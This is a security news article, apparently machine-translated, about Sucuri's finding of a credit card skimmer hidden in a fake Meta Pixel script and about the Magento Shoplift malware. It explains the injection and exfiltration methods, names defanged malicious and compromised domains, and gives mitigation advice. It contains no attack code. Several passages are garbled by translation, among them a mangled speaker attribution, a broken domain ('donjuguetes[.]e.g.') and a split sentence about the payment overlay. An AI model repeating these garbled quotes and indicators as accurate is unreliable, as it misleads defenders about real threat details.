Cybersecurity researchers have discovered a credit card skimmer hidden inside a fake Meta Pixel tracking script in an attempt to evade detection.
Sucuri said the malware is injected into websites via tools that allow custom code, such as WordPress plugins like Simple Custom CSS and JS or the “Miscellaneous Scripts” section of the Magento admin panel.
“Custom script editors are popular with bad actors because they allow external third-party (and malicious) JavaScript and can easily pretend to be benign by exploiting naming conventions that match popular scripts like Google Analytics or libraries like JQuery,” the researcher said safety Matt Morrow.
The fake Meta Pixel tracking script identified by the web security firm contains similar elements to its legitimate counterpart, but closer inspection reveals the addition of JavaScript code that replaces references to the “connect.facebook” domain[.]net” with “b-connected[.]com.”
While the first is a genuine domain linked to the Pixel tracking feature, the replacement domain is used to load an additional malicious script (“fbevents.js”) that monitors whether a victim is on a payment page and, if so, provides a fraudulent service. overlay to capture credit card details.
It is worth noting that “b-connected[.]com” is a legitimate e-commerce site that was compromised at some point to host the skimmer code. Additionally, the information entered into the fake form is exfiltrated to another compromised site (“www.donjuguetes[.]e.g.”).
To mitigate these risks, we recommend that you keep your sites updated, periodically review your administrator accounts to determine if they are all valid, and update your passwords frequently.
This is especially important since threat actors are known to exploit weak passwords and flaws in WordPress plugins to gain elevated access to a target site and add unauthorized administrator users, who are then used to perform various other tasks, including adding additional plugins and backdoors.
“Because credit card thieves often wait for keywords like ‘checkout’ or ‘onepage,’ they may not become visible until the checkout page loads,” Morrow said.
“Because most checkout pages are dynamically generated based on cookie data and other variables passed to the page, these scripts evade public scanners, and the only way to identify the malware is to check the source of the page or observe network traffic. These scripts run silently in the background.”
The development comes as Sucuri also revealed that sites built with WordPress and Magento are the target of another malware called Magento Shoplift. Previous variants of Magento Shoplift have been detected in circulation since September 2023.
The attack chain begins with the insertion of an obfuscated JavaScript snippet into a legitimate JavScript file responsible for loading a second script from jqueurystatics[.]com via WebSocket Secure (WSS), which, in turn, is designed to facilitate credit card skimming and data theft by masquerading as Google Analytics scripts.
“WordPress has also become a major player in e-commerce, thanks to the adoption of Woocommerce and other plugins that can easily transform a WordPress site into a full-featured online store,” said researcher Puja Srivastava.
“This popularity also makes WordPress stores a prime target, and attackers are modifying their MageCart ecommerce malware to target a broader range of CMS platforms.”